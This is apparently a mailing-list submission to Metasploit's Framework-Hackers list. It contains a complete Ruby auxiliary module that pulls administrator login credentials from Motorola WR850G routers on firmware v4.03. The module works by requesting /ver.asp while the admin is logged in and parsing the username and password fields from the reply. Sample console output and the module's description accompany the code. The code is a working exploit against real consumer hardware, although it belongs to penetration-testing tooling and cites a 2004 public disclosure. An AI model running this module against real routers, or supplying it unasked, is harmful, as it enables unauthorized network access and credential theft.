-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hey guys,
I've attached a new auxiliary module for obtaining the login credentials to a Motorola WR850G router with firmware v4.03. I just put it under admin, but there is probably a better place for it. msf auxiliary(wr850g_cred) > run [*] Found username "xxxx" and password "yyyy" [*] Auxiliary module execution completed msf > info admin/wr850g_cred Name: Motorola WR850G v4.03 Credentials Version: 1 Provided by: Kris Katterjohn <[EMAIL PROTECTED]> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 80 yes The target port Description: Login credentials to the Motorola WR850G router with firmware v4.03 can be obtained via a simple GET request if issued while the administrator is logged in. A lot more information is available through this request, but you can get it all and more after logging in. This was disclosed back in Sep 2004, but I still easily found one lying around with this firmware. Thanks, Kris Katterjohn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIVAwUBSOhXA/9K37xXYl36AQJ9Ww//e5dyR9E4yqoIYYqARyOlyJ47mAQvxmpK mmsLFjOQaqmupEpb7fk85zB3YEHqgYwDp6eLKgsZ4T0xGjmq4PcE1JH8c5L5Vdwd p9lx1HLkzU759Dk9azcHDhTDSYsvGxxuVShbQiYLX8G0u+M8toiJqJ9iFNFkc3mO sDP681NG7hG0i8kB0myWkXBhuVk+qc5S1hThmaCyqTNKFnjckCfRvsU/8Y1/IiOp of0LGIayxn4RPhPXMpaXxowhEE+ey5xMKgYpkl7c7Rg7+fAU5LIHQwUEBlP1szv9 9CXuB5WNl8wMSGGZ62ktu3zQIi901LEQxO7W87KmePi7g087tBu60EM5+gz/qIto xuxvToutzlBAdhtxKx09XRXTlcRlm3P/AxXJP7neXP8QxEwgR3swsPtTzf0vMOb5 vykTFSBrhbWP13WIhNH8gPN5zOEXV8RzY4pbJklSZ106TTDRH2dY6b8eLA2jW03L 2BtJAhO6GFL5cYbf28r2yIIqFauy13MGgqhjI/p/rRsxYAMh7ITL5388YVLm+QYd vAPxGxztIla2MHeB/C6sAzj9+U2db/ItISg+W1Cn56+Mhkcou8Nd4NIqlhZbzwUm v3u3SoToa6f0GpAlTyjqwf0+ydHmWL+xRbiIb0pJQJzEohkksf9/6uBQ1B/08wyn YKKXU8cKEmk= =VU+S -----END PGP SIGNATURE-----
require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Motorola WR850G v4.03 Credentials', 'Description' => %q{ Login credentials to the Motorola WR850G router with firmware v4.03 can be obtained via a simple GET request if issued while the administrator is logged in. A lot more information is available through this request, but you can get it all and more after logging in. }, 'Author' => 'Kris Katterjohn <[EMAIL PROTECTED]>', 'License' => MSF_LICENSE, 'Version' => '1', 'References' => [ [ 'URL', 'http://seclists.org/bugtraq/2004/Sep/0339.html'] ], 'DisclosureDate' => 'Sep 24 2004')) register_options([Opt::RPORT(80)]) end def run connect sock.put("GET /ver.asp HTTP/1.0\r\n\r\n") response = sock.get disconnect if response.nil? or response.empty? print_status("No response from server") return end # 302 Redirect if response.split(/\r\n/)[0] !~ /200 Ok/ print_status("Administrator not logged in") return end user = $1 if response.match("http_username=([^\n]*)<br>") pass = $1 if response.match("http_passwd=([^\n]*)<br>") print_status("Found username \"#{user}\" and password \"#{pass}\"") if user and pass end end
_______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers